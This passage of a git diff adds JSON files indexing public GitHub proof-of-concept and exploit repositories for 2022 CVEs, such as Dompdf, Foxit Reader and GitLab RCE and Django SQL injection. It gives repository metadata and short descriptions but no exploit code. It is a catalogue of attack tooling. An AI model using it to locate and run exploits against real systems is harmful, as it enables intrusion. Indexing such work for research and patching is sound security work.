"https:\/\/github.com\/aengussong\/hikvision_probe", + "description": "Identify hikvision ip and probe for cve-s (CVE-2017-7921, CVE-2022-28171, CVE-2021-36260)", + "fork": false, + "created_at": "2024-11-26T13:02:18Z", + "updated_at": "2024-11-26T13:23:21Z", + "pushed_at": "2024-11-26T13:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28219.json b/2022/CVE-2022-28219.json new file mode 100644 index 0000000000..ac017b07ac --- /dev/null +++ b/2022/CVE-2022-28219.json @@ -0,0 +1,95 @@ +[ + { + "id": 507616800, + "name": "CVE-2022-28219", + "full_name": "horizon3ai\/CVE-2022-28219", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-28219", + "description": "PoC for ManageEngine ADAudit Plus CVE-2022-28219", + "fork": false, + "created_at": "2022-06-26T15:48:27Z", + "updated_at": "2024-08-12T20:24:32Z", + "pushed_at": "2022-06-26T16:46:55Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 509605278, + "name": "manageengine-auditad-cve-2022-28219", + "full_name": "rbowes-r7\/manageengine-auditad-cve-2022-28219", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/manageengine-auditad-cve-2022-28219", + "description": null, + "fork": false, + "created_at": "2022-07-01T22:40:46Z", + "updated_at": "2023-05-08T09:56:02Z", + "pushed_at": "2022-07-05T22:13:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 518384320, + "name": "CVE-2022-28219-Like", + "full_name": "aeifkz\/CVE-2022-28219-Like", + "owner": { + "login": "aeifkz", + "id": 2063610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2063610?v=4", + "html_url": "https:\/\/github.com\/aeifkz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeifkz\/CVE-2022-28219-Like", + "description": "建立一個概念類似 CVE-2022-28219 的測試環境", + "fork": false, + "created_at": "2022-07-27T09:03:10Z", + "updated_at": "2022-12-15T00:29:34Z", + "pushed_at": "2022-10-31T12:55:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28281.json b/2022/CVE-2022-28281.json new file mode 100644 index 0000000000..e4632cf71d --- /dev/null +++ b/2022/CVE-2022-28281.json @@ -0,0 +1,40 @@ +[ + { + "id": 479221713, + "name": "CVE-2022-28281", + "full_name": "0vercl0k\/CVE-2022-28281", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2022-28281", + "description": "PoC for CVE-2022-28281 a Mozilla Firefox Out of bounds write.", + "fork": false, + "created_at": "2022-04-08T02:49:09Z", + "updated_at": "2024-10-26T14:41:25Z", + "pushed_at": "2022-04-08T15:21:26Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-28281", + "firefox", + "memory-corruption", + "mozilla", + "sandbox-escape", + "webauthn" + ], + "visibility": "public", + "forks": 13, + "watchers": 74, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28282.json b/2022/CVE-2022-28282.json new file mode 100644 index 0000000000..587c53db12 --- /dev/null +++ b/2022/CVE-2022-28282.json @@ -0,0 +1,33 @@ +[ + { + "id": 541124972, + "name": "CVE-2022-28282-firefox", + "full_name": "bb33bb\/CVE-2022-28282-firefox", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-28282-firefox", + "description": "PoC for CVE-2022-28282", + "fork": false, + "created_at": "2022-09-25T09:51:21Z", + "updated_at": "2022-09-25T13:12:44Z", + "pushed_at": "2022-09-25T09:30:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28346.json b/2022/CVE-2022-28346.json new file mode 100644 index 0000000000..6dccbecf53 --- /dev/null +++ b/2022/CVE-2022-28346.json @@ -0,0 +1,157 @@ +[ + { + "id": 485285000, + "name": "CVE-2022-28346", + "full_name": "YouGina\/CVE-2022-28346", + "owner": { + "login": "YouGina", + "id": 5002624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5002624?v=4", + "html_url": "https:\/\/github.com\/YouGina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YouGina\/CVE-2022-28346", + "description": "SQL injection in QuerySet.annotate(), aggregate(), and extra()", + "fork": false, + "created_at": "2022-04-25T08:27:34Z", + "updated_at": "2023-07-18T07:41:07Z", + "pushed_at": "2022-04-25T11:18:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485828921, + "name": "CVE-2022-28346", + "full_name": "DeEpinGh0st\/CVE-2022-28346", + "owner": { + "login": "DeEpinGh0st", + "id": 34375573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34375573?v=4", + "html_url": "https:\/\/github.com\/DeEpinGh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DeEpinGh0st\/CVE-2022-28346", + "description": "Django QuerySet.annotate(), aggregate(), extra() SQL 注入", + "fork": false, + "created_at": "2022-04-26T14:47:56Z", + "updated_at": "2024-08-12T20:22:46Z", + "pushed_at": "2022-05-31T03:28:34Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 23, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 492352752, + "name": "CVE-2022-28346", + "full_name": "ahsentekd\/CVE-2022-28346", + "owner": { + "login": "ahsentekd", + "id": 23294573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23294573?v=4", + "html_url": "https:\/\/github.com\/ahsentekd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahsentekd\/CVE-2022-28346", + "description": "An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.", + "fork": false, + "created_at": "2022-05-15T00:24:19Z", + "updated_at": "2024-09-13T11:00:52Z", + "pushed_at": "2022-05-15T00:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609374925, + "name": "CVE-2022-28346", + "full_name": "vincentinttsh\/CVE-2022-28346", + "owner": { + "login": "vincentinttsh", + "id": 14941597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941597?v=4", + "html_url": "https:\/\/github.com\/vincentinttsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentinttsh\/CVE-2022-28346", + "description": "An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.", + "fork": false, + "created_at": "2023-03-04T01:43:58Z", + "updated_at": "2022-08-24T08:06:59Z", + "pushed_at": "2022-05-15T00:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745257468, + "name": "CVE-2022-28346", + "full_name": "kamal-marouane\/CVE-2022-28346", + "owner": { + "login": "kamal-marouane", + "id": 110986028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110986028?v=4", + "html_url": "https:\/\/github.com\/kamal-marouane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamal-marouane\/CVE-2022-28346", + "description": "A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.", + "fork": false, + "created_at": "2024-01-19T00:15:59Z", + "updated_at": "2024-01-20T05:30:50Z", + "pushed_at": "2024-01-19T04:00:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28368.json b/2022/CVE-2022-28368.json new file mode 100644 index 0000000000..4ac9b2a603 --- /dev/null +++ b/2022/CVE-2022-28368.json @@ -0,0 +1,100 @@ +[ + { + "id": 601030910, + "name": "CVE-2022-28368", + "full_name": "rvizx\/CVE-2022-28368", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2022-28368", + "description": "Dompdf RCE PoC Exploit - CVE-2022-28368", + "fork": false, + "created_at": "2023-02-13T08:10:00Z", + "updated_at": "2024-08-01T15:21:21Z", + "pushed_at": "2024-01-19T04:35:32Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-28368", + "cybersecurity", + "dompdf", + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633796587, + "name": "CVE-2022-28368-handler", + "full_name": "That-Guy-Steve\/CVE-2022-28368-handler", + "owner": { + "login": "That-Guy-Steve", + "id": 130059785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130059785?v=4", + "html_url": "https:\/\/github.com\/That-Guy-Steve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/That-Guy-Steve\/CVE-2022-28368-handler", + "description": "This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request", + "fork": false, + "created_at": "2023-04-28T09:49:05Z", + "updated_at": "2023-04-28T12:42:28Z", + "pushed_at": "2023-04-28T12:57:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637435384, + "name": "Dompdf-Exploit-RCE", + "full_name": "Henryisnotavailable\/Dompdf-Exploit-RCE", + "owner": { + "login": "Henryisnotavailable", + "id": 112469853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112469853?v=4", + "html_url": "https:\/\/github.com\/Henryisnotavailable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henryisnotavailable\/Dompdf-Exploit-RCE", + "description": "An exploit script for CVE-2022-28368 designed to make exploitation less annoying, made for a HTB machine", + "fork": false, + "created_at": "2023-05-07T14:49:38Z", + "updated_at": "2023-05-07T14:51:35Z", + "pushed_at": "2023-05-07T15:39:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28381.json b/2022/CVE-2022-28381.json new file mode 100644 index 0000000000..8e48f31d9c --- /dev/null +++ b/2022/CVE-2022-28381.json @@ -0,0 +1,33 @@ +[ + { + "id": 528577166, + "name": "CVE-2022-28381_PoC", + "full_name": "DShankle\/CVE-2022-28381_PoC", + "owner": { + "login": "DShankle", + "id": 44985044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4", + "html_url": "https:\/\/github.com\/DShankle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DShankle\/CVE-2022-28381_PoC", + "description": null, + "fork": false, + "created_at": "2022-08-24T20:04:58Z", + "updated_at": "2022-08-29T17:20:43Z", + "pushed_at": "2022-08-24T20:05:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28452.json b/2022/CVE-2022-28452.json new file mode 100644 index 0000000000..184135ebd8 --- /dev/null +++ b/2022/CVE-2022-28452.json @@ -0,0 +1,33 @@ +[ + { + "id": 486819711, + "name": "Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL", + "full_name": "YavuzSahbaz\/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL", + "owner": { + "login": "YavuzSahbaz", + "id": 101733340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101733340?v=4", + "html_url": "https:\/\/github.com\/YavuzSahbaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YavuzSahbaz\/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL", + "description": "CVE-2022-28452", + "fork": false, + "created_at": "2022-04-29T03:03:25Z", + "updated_at": "2022-04-30T02:14:11Z", + "pushed_at": "2022-04-29T03:11:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28454.json b/2022/CVE-2022-28454.json new file mode 100644 index 0000000000..0e5f0c68e3 --- /dev/null +++ b/2022/CVE-2022-28454.json @@ -0,0 +1,33 @@ +[ + { + "id": 486402247, + "name": "Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-", + "full_name": "YavuzSahbaz\/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-", + "owner": { + "login": "YavuzSahbaz", + "id": 101733340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101733340?v=4", + "html_url": "https:\/\/github.com\/YavuzSahbaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YavuzSahbaz\/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-", + "description": "CVE-2022-28454", + "fork": false, + "created_at": "2022-04-28T01:12:19Z", + "updated_at": "2022-04-28T08:43:05Z", + "pushed_at": "2022-04-28T01:17:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28508.json b/2022/CVE-2022-28508.json new file mode 100644 index 0000000000..28497979bf --- /dev/null +++ b/2022/CVE-2022-28508.json @@ -0,0 +1,33 @@ +[ + { + "id": 486401731, + "name": "CVE-2022-28508", + "full_name": "YavuzSahbaz\/CVE-2022-28508", + "owner": { + "login": "YavuzSahbaz", + "id": 101733340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101733340?v=4", + "html_url": "https:\/\/github.com\/YavuzSahbaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YavuzSahbaz\/CVE-2022-28508", + "description": "CVE-2022-28508", + "fork": false, + "created_at": "2022-04-28T01:10:17Z", + "updated_at": "2022-05-09T07:30:32Z", + "pushed_at": "2022-04-30T03:15:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28590.json b/2022/CVE-2022-28590.json new file mode 100644 index 0000000000..3fcea1ad82 --- /dev/null +++ b/2022/CVE-2022-28590.json @@ -0,0 +1,33 @@ +[ + { + "id": 490311941, + "name": "CVE-2022-28590", + "full_name": "jcarabantes\/CVE-2022-28590", + "owner": { + "login": "jcarabantes", + "id": 9590425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9590425?v=4", + "html_url": "https:\/\/github.com\/jcarabantes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcarabantes\/CVE-2022-28590", + "description": null, + "fork": false, + "created_at": "2022-05-09T14:12:58Z", + "updated_at": "2024-08-20T05:55:23Z", + "pushed_at": "2022-05-09T14:18:28Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28598.json b/2022/CVE-2022-28598.json new file mode 100644 index 0000000000..e3f21e151a --- /dev/null +++ b/2022/CVE-2022-28598.json @@ -0,0 +1,33 @@ +[ + { + "id": 492786625, + "name": "CVE-2022-28598", + "full_name": "patrickdeanramos\/CVE-2022-28598", + "owner": { + "login": "patrickdeanramos", + "id": 17971824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17971824?v=4", + "html_url": "https:\/\/github.com\/patrickdeanramos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickdeanramos\/CVE-2022-28598", + "description": "Persistent XSS on 'last_known_version' field (My Settings)", + "fork": false, + "created_at": "2022-05-16T10:27:47Z", + "updated_at": "2022-05-16T10:27:47Z", + "pushed_at": "2023-02-06T07:48:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28601.json b/2022/CVE-2022-28601.json new file mode 100644 index 0000000000..7729bef0ec --- /dev/null +++ b/2022/CVE-2022-28601.json @@ -0,0 +1,33 @@ +[ + { + "id": 490371011, + "name": "CVE-2022-28601", + "full_name": "FlaviuPopescu\/CVE-2022-28601", + "owner": { + "login": "FlaviuPopescu", + "id": 62330554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62330554?v=4", + "html_url": "https:\/\/github.com\/FlaviuPopescu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlaviuPopescu\/CVE-2022-28601", + "description": "A Two-Factor Authentication (2FA) bypass vulnerability in \"Simple 2FA Plugin for Moodle\" by LMS Doctor", + "fork": false, + "created_at": "2022-05-09T16:57:14Z", + "updated_at": "2024-08-12T20:23:07Z", + "pushed_at": "2022-05-09T17:05:38Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28672.json b/2022/CVE-2022-28672.json new file mode 100644 index 0000000000..8974a45ebc --- /dev/null +++ b/2022/CVE-2022-28672.json @@ -0,0 +1,75 @@ +[ + { + "id": 573557575, + "name": "CVE-2022-28672", + "full_name": "hacksysteam\/CVE-2022-28672", + "owner": { + "login": "hacksysteam", + "id": 4098538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4", + "html_url": "https:\/\/github.com\/hacksysteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2022-28672", + "description": "Foxit PDF Reader Remote Code Execution Exploit", + "fork": false, + "created_at": "2022-12-02T18:52:20Z", + "updated_at": "2024-08-12T20:28:38Z", + "pushed_at": "2023-12-05T12:22:45Z", + "stargazers_count": 115, + "watchers_count": 115, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aslr-bypass", + "cve-2022-28672", + "dep-bypass", + "exploit", + "foxit", + "foxitreader", + "jit", + "jit-spraying", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 25, + "watchers": 115, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584971290, + "name": "CVE-2022-28672", + "full_name": "fastmo\/CVE-2022-28672", + "owner": { + "login": "fastmo", + "id": 53575270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53575270?v=4", + "html_url": "https:\/\/github.com\/fastmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fastmo\/CVE-2022-28672", + "description": " CVE-2022-28672 Vulnerabilidad Foxit PDF Reader - UaF - RCE - JIT Spraying", + "fork": false, + "created_at": "2023-01-04T01:39:04Z", + "updated_at": "2023-01-04T02:03:45Z", + "pushed_at": "2023-01-04T02:04:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2884.json b/2022/CVE-2022-2884.json new file mode 100644 index 0000000000..eab1bfb433 --- /dev/null +++ b/2022/CVE-2022-2884.json @@ -0,0 +1,41 @@ +[ + { + "id": 581263876, + "name": "gitlab_rce_cve-2022-2884", + "full_name": "m3ssap0\/gitlab_rce_cve-2022-2884", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/gitlab_rce_cve-2022-2884", + "description": "Exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.", + "fork": false, + "created_at": "2022-12-22T17:52:26Z", + "updated_at": "2024-11-04T00:37:35Z", + "pushed_at": "2022-12-26T09:49:16Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-2884", + "exploit", + "gitlab", + "security", + "security-tools", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 5, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28943.json b/2022/CVE-2022-28943.json new file mode 100644 index 0000000000..85184b6d58 --- /dev/null +++ b/2022/CVE-2022-28943.json @@ -0,0 +1,33 @@ +[ + { + "id": 479195951, + "name": "CVE-2022-28943", + "full_name": "zhefox\/CVE-2022-28943", + "owner": { + "login": "zhefox", + "id": 77232781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77232781?v=4", + "html_url": "https:\/\/github.com\/zhefox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhefox\/CVE-2022-28943", + "description": "h3c", + "fork": false, + "created_at": "2022-04-08T00:53:31Z", + "updated_at": "2023-03-16T16:57:36Z", + "pushed_at": "2022-04-21T04:58:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28944.json b/2022/CVE-2022-28944.json new file mode 100644 index 0000000000..1fe2a5f72b --- /dev/null +++ b/2022/CVE-2022-28944.json @@ -0,0 +1,33 @@ +[ + { + "id": 490804923, + "name": "cve-2022-28944", + "full_name": "gerr-re\/cve-2022-28944", + "owner": { + "login": "gerr-re", + "id": 92781905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92781905?v=4", + "html_url": "https:\/\/github.com\/gerr-re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerr-re\/cve-2022-28944", + "description": null, + "fork": false, + "created_at": "2022-05-10T17:52:31Z", + "updated_at": "2023-11-23T12:06:19Z", + "pushed_at": "2023-01-13T08:39:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28986.json b/2022/CVE-2022-28986.json new file mode 100644 index 0000000000..331b991682 --- /dev/null +++ b/2022/CVE-2022-28986.json @@ -0,0 +1,33 @@ +[ + { + "id": 504081605, + "name": "CVE-2022-28986", + "full_name": "FlaviuPopescu\/CVE-2022-28986", + "owner": { + "login": "FlaviuPopescu", + "id": 62330554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62330554?v=4", + "html_url": "https:\/\/github.com\/FlaviuPopescu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlaviuPopescu\/CVE-2022-28986", + "description": "A Insecure direct object references (IDOR) vulnerability in \"Simple 2FA Plugin for Moodle\" by LMS Doctor", + "fork": false, + "created_at": "2022-06-16T08:52:28Z", + "updated_at": "2024-10-04T02:08:02Z", + "pushed_at": "2022-06-16T08:53:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29004.json b/2022/CVE-2022-29004.json new file mode 100644 index 0000000000..0695e97e11 --- /dev/null +++ b/2022/CVE-2022-29004.json @@ -0,0 +1,33 @@ +[ + { + "id": 494764335, + "name": "CVE-2022-29004", + "full_name": "sudoninja-noob\/CVE-2022-29004", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29004", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:30:32Z", + "updated_at": "2022-05-21T11:49:38Z", + "pushed_at": "2022-05-21T11:49:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29005.json b/2022/CVE-2022-29005.json new file mode 100644 index 0000000000..f01b9191b9 --- /dev/null +++ b/2022/CVE-2022-29005.json @@ -0,0 +1,33 @@ +[ + { + "id": 494769164, + "name": "CVE-2022-29005", + "full_name": "sudoninja-noob\/CVE-2022-29005", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29005", + "description": null, + "fork": false, + "created_at": 